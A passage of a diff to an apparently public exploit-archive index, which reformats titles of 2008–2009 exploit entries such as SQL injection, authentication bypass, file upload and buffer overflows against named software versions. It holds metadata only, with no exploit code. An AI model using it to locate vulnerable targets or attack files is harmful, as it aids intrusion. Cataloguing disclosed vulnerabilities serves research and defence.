SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0 +7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - (Auth Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection",2008-11-28,Stack,php,webapps,0 7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - (AccountID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 @@ -6857,7 +6857,7 @@ id,file,description,date,author,platform,type,port 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 7312,platforms/php/webapps/7312.txt,"Andy's PHP Knowledgebase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0 -7313,platforms/linux/local/7313.sh,"Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC",2008-12-01,"Paul Szabo",linux,local,0 +7313,platforms/linux/local/7313.sh,"Debian GNU/Linux (symlink attack in login) - Arbitrary File Ownership PoC",2008-12-01,"Paul Szabo",linux,local,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - (Auth Bypass) SQL Injection",2008-12-01,t0fx,php,webapps,0 7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure",2008-12-01,"CWH Underground",asp,webapps,0 @@ -6874,8 +6874,8 @@ id,file,description,date,author,platform,type,port 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - (.rdp) Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - (JPEG Parsing) Recursive Stack Overflow PoC",2008-12-03,"ilja van sprundel",multiple,dos,0 7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 - (id) SQL Injection Exploit",2008-12-03,StAkeR,php,webapps,0 -7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 -7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS (Auth Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0 +7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 +7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - (Auth Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0 7334,platforms/windows/local/7334.pl,"RadAsm 2.2.1.5 - (.RAP) WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0 @@ -6892,7 +6892,7 @@ id,file,description,date,author,platform,type,port 7347,platforms/windows/local/7347.pl,"PEiD 0.92 - Malformed PE File Universal Buffer Overflow Exploit",2008-12-05,SkD,windows,local,0 7348,platforms/asp/webapps/7348.txt,"merlix educate servert - (bypass/DD) Multiple Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0 7349,platforms/asp/webapps/7349.txt,"RankEm - (rankup.asp siteID) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 -7350,platforms/asp/webapps/7350.txt,"RankEm (auth bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 +7350,platforms/asp/webapps/7350.txt,"RankEm - (Auth bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - (XSS/DD) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,php,webapps,0 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (DD/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0 7353,platforms/asp/webapps/7353.txt,"Cold BBS - (cforum.mdb) Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 @@ -6910,7 +6910,7 @@ id,file,description,date,author,platform,type,port 7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7367,platforms/php/webapps/7367.php,"PayPal eStore Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 -7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 +7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit",2008-12-07,DNX,php,webapps,0 7370,platforms/asp/webapps/7370.txt,"NatterChat 1.12 - (natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 @@ -6966,13 +6966,13 @@ id,file,description,date,author,platform,type,port 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - (lang) Local File Inclusion",2008-12-11,x0r,php,webapps,0 7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 -7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 +7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Remote File Upload",2008-12-11,ahmadbady,php,webapps,0 7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0 7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0 7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0 -7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC",2008-12-12,"Jerome Athias",windows,dos,0 +7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic - ActiveX Controls mscomct2.ocx Buffer Overflow PoC",2008-12-12,"Jerome Athias",windows,dos,0 7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - (home.html menu) Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 7433,platforms/php/webapps/7433.txt,"Social Groupie - (group_index.php id) SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 @@ -6980,7 +6980,7 @@ id,file,description,date,author,platform,type,port 7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - (SQL/dd) Multiple Vulnerabilities",2008-12-12,Pouya_Server,asp,webapps,0 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 Database Disclosure",2008-12-12,Dxil,asp,webapps,0 -7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script (id) SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 +7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - (id) SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0 7441,platforms/php/webapps/7441.txt,"joomla live chat - (SQL/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure",2008-12-12,"Simon Ryeo",windows,remote,0 @@ -6997,8 +6997,8 @@ id,file,description,date,author,platform,type,port 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - (download.php) Remote",2008-12-14,x0r,php,webapps,0 -7456,platforms/php/webapps/7456.txt,"Availscript Article Script Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 -7457,platforms/php/webapps/7457.txt,"Availscript Classmate Script Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 +7456,platforms/php/webapps/7456.txt,"Availscript Article Script - Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 +7457,platforms/php/webapps/7457.txt,"Availscript Classmate Script - Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - (index.php lang) Local File Inclusion",2008-12-14,Osirys,php,webapps,0 7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,php,webapps,0 7460,platforms/windows/dos/7460.html,"EvansFTP - (EvansFTP.ocx) Remote Buffer Overflow PoC",2008-12-14,Bl@ckbe@rD,windows,dos,0 @@ -7030,7 +7030,7 @@ id,file,description,date,author,platform,type,port 7486,platforms/asp/webapps/7486.txt,"click&rank - SQL / XSS",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - (download.php) SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGguestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 -7489,platforms/php/webapps/7489.pl,"FLDS 1.2a report.php (linkida) SQL Injection Exploit",2008-12-16,ka0x,php,webapps,0 +7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - report.php (linkida) SQL Injection Exploit",2008-12-16,ka0x,php,webapps,0 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection Exploit",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 7492,platforms/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - PlayList BoF Exploit",2008-12-16,shinnai,windows,local,0 @@ -7071,7 +7071,7 @@ id,file,description,date,author,platform,type,port 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Remote Shell Upload Exploit",2008-12-19,Ams,php,webapps,0 7529,platforms/php/webapps/7529.txt,"constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Remote Blind SQL Injection Exploit",2008-12-21,katharsis,php,webapps,0 -7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0 +7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0 7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - (DB Backup/DD/XSS) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 @@ -7093,7 +7093,7 @@ id,file,description,date,author,platform,type,port 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Auth Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 -7553,platforms/php/webapps/7553.sh,"RoundCube Webmail 0.2b Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 +7553,platforms/php/webapps/7553.sh,"RoundCube Webmail 0.2b - Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client - (8010/tcp) Remote Denial of Service (Windows/Linux)",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 @@ -7102,8 +7102,8 @@ id,file,description,date,author,platform,type,port 7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection Exploit",2008-12-23,s4avrd0w,php,webapps,0 7560,platforms/php/webapps/7560.txt,"cms netcat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards XSS/Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 -7562,platforms/php/webapps/7562.txt,"phpAdBoard (php uploads) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 -7563,platforms/php/webapps/7563.txt,"phpEmployment (php upload) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 +7562,platforms/php/webapps/7562.txt,"phpAdBoard (php uploads) - Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 +7563,platforms/php/webapps/7563.txt,"phpEmployment (php upload) - Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7564,platforms/multiple/dos/7564.pl,"Getleft 1.2 - Remote Buffer Overflow Proof of Concept",2008-12-23,Koshi,multiple,dos,0 7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 - (thread.php id) SQL Injection",2008-12-23,Samir-M,php,webapps,0 7566,platforms/windows/remote/7566.html,"Google Chrome Browser - (ChromeHTML://) Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote,0 @@ -7131,13 +7131,13 @@ id,file,description,date,author,platform,type,port 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - (.bps) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow PoC",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 -7594,platforms/windows/remote/7594.html,"Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 +7594,platforms/windows/remote/7594.html,"Chilkat FTP - ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Admin Bypass",2008-12-28,k3yv4n,php,webapps,0 7596,platforms/php/webapps/7596.txt,"AlstraSoft Web Email Script Enterprise - (id) SQL Injection",2008-12-28,Bgh7,php,webapps,0 7597,platforms/php/webapps/7597.txt,"OwenPoll 1.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI (id) SQL Injection",2008-12-28,"Khashayar Fereidani",php,webapps,0 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0 -7600,platforms/php/webapps/7600.pl,"Flexphplink Pro Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0 +7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Auth Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0 7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 @@ -7163,10 +7163,10 @@ id,file,description,date,author,platform,type,port 7623,platforms/windows/remote/7623.html,"Megacubo 5.0.7 - (mega://) Remote eval() Injection Exploit",2008-12-30,Nine:Situations:Group,windows,remote,0 7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Auth Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection/Local File Inclusion",2008-12-30,SirGod,php,webapps,0 -7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 +7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 -7629,platforms/php/webapps/7629.txt,"DDL-Speed Script (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 +7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 7631,platforms/php/webapps/7631.txt,"2Capsule - (sticker.php id) SQL Injection",2009-01-01,Zenith,php,webapps,0 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0 @@ -7179,7 +7179,7 @@ id,file,description,date,author,platform,type,port 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Admin Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - (news.php newsid) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 -7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a (Auth Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 +7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Auth Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - XSS / Remote Crash",2009-01-01,StAkeR,multiple,dos,0 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 @@ -7223,7 +7223,7 @@ id,file,description,date,author,platform,type,port 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - (frontpage.php) Blind SQL Injection Exploit",2009-01-06,darkjoker,php,webapps,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow Exploit",2009-01-06,"Encrypt3d.M!nd ",windows,local,0 7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0 -7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a (Auth Bypass) SQL Injection",2009-01-06,certaindeath,php,webapps,0 +7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - (Auth Bypass) SQL Injection",2009-01-06,certaindeath,php,webapps,0 7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote/Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow Exploit",2009-01-07,send9,windows,local,0 7689,platforms/php/webapps/7689.txt,"BlogHelper - (common_db.inc) Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 @@ -7338,9 +7338,9 @@ id,file,description,date,author,platform,type,port 7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - (readbible.php) SQL Injection",2009-01-15,nuclear,php,webapps,0 7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 - (ICEbrowser) Remote System Denial of Service",2009-01-16,"Jeremy Brown",windows,dos,0 7800,platforms/asp/webapps/7800.txt,"eFAQ - (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 -7801,platforms/asp/webapps/7801.txt,"eReservations (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 -7802,platforms/asp/webapps/7802.txt,"The Walking Club (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 -7803,platforms/asp/webapps/7803.txt,"Ping IP (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 +7801,platforms/asp/webapps/7801.txt,"eReservations - (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 +7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 +7803,platforms/asp/webapps/7803.txt,"Ping IP - (Auth Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 7804,platforms/windows/remote/7804.html,"MetaProducts MetaTreeX 1.5.100 - ActiveX File Overwrite Exploit",2009-01-16,Houssamix,windows,remote,0 7805,platforms/php/webapps/7805.txt,"rankem - (DD/XSS/cm) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 7806,platforms/php/webapps/7806.txt,"blogit! - (SQL/DD/XSS) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 @@ -7414,7 +7414,7 @@ id,file,description,date,author,platform,type,port 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink Organizer - (index.php cat) SQL Injection",2009-01-26,nuclear,php,webapps,0 7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion Exploit",2009-01-26,darkjoker,php,webapps,0 -7880,platforms/php/webapps/7880.txt,"ClickAuction (Auth Bypass) SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0 +7880,platforms/php/webapps/7880.txt,"ClickAuction - (Auth Bypass) SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0 7881,platforms/php/webapps/7881.txt,"Joomla com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 7882,platforms/windows/dos/7882.html,"NCTVideoStudio ActiveX DLLs 1.6 - Remote Heap Overflow PoC",2009-01-26,Stack,windows,dos,0 7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 @@ -7427,7 +7427,7 @@ id,file,description,date,author,platform,type,port 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - (.gqmpeg) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (XSS/SQL/LFI) Multiple Vulnerabilities",2009-01-28,"Encrypt3d.M!nd ",php,webapps,0 -7894,platforms/php/webapps/7894.txt,"Chipmunk Blog (Auth Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 +7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Auth Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - (template) Local File Inclusion",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - (article.php) Blind SQL Injection Exploit",2009-01-28,OzX,php,webapps,0 7897,platforms/php/webapps/7897.php,"phplist 2.10.x - (RCE by environ inclusion) Local File Inclusion Exploit",2009-01-28,mozi,php,webapps,0 @@ -7455,7 +7455,7 @@ id,file,description,date,author,platform,type,port 7921,platforms/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 - CSRF Exploit",2009-01-29,"Michael Brooks",hardware,remote,0 7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - CSRF Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7923,platforms/windows/local/7923.c,"Total Video Player 1.3.7 - (.m3u) Local Buffer Overflow Exploit",2009-01-29,SimO-s0fT,windows,local,0 -7924,platforms/asp/webapps/7924.txt,"SalesCart (Auth Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0 +7924,platforms/asp/webapps/7924.txt,"SalesCart - (Auth Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0 7925,platforms/php/webapps/7925.txt,"revou twitter clone - (XSS/SQL) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0 7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote SEH Overwrite Exploit",2009-01-30,LiquidWorm,windows,remote,0 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 @@ -7653,7 +7653,7 @@ id,file,description,date,author,platform,type,port 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor (Accept-Language) Request BoF PoC",2009-03-02,"Praveen Darshanam",windows,dos,0 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 -8132,platforms/asp/webapps/8132.txt,"Access2asp imageLibrary Arbitrary ASP Shell Upload",2009-03-02,mr.al7rbi,asp,webapps,0 +8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary Arbitrary ASP Shell Upload",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - (SQL/CH) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla com_digistore - (pid) Blind SQL Injection Exploit",2009-03-02,InjEctOr5,php,webapps,0 8135,platforms/windows/dos/8135.pl,"Media Commands - (M3U & M3l & TXT & LRC Files) Local Heap Overflow PoC",2009-03-02,Hakxer,windows,dos,0 @@ -7665,7 +7665,7 @@ id,file,description,date,author,platform,type,port 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - (SQL/ab/LFI) Multiple Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0 8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server Authentication Request BoF Exploit (SEH)",2009-03-03,His0k4,windows,remote,80 8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - (sopocx.ocx) Command Execution Exploit",2009-03-03,Nine:Situations:Group,windows,remote,0 -8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin ActiveX Control Remote Code Execution Exploit",2009-03-03,Elazar,windows,remote,0 +8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution Exploit",2009-03-03,Elazar,windows,remote,0 8145,platforms/php/webapps/8145.txt,"ghostscripter Amazon Shop - (XSS/DT/RFI) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (multiple headers) Remote Denial of Service",2009-03-03,"Praveen Darshanam",multiple,dos,0 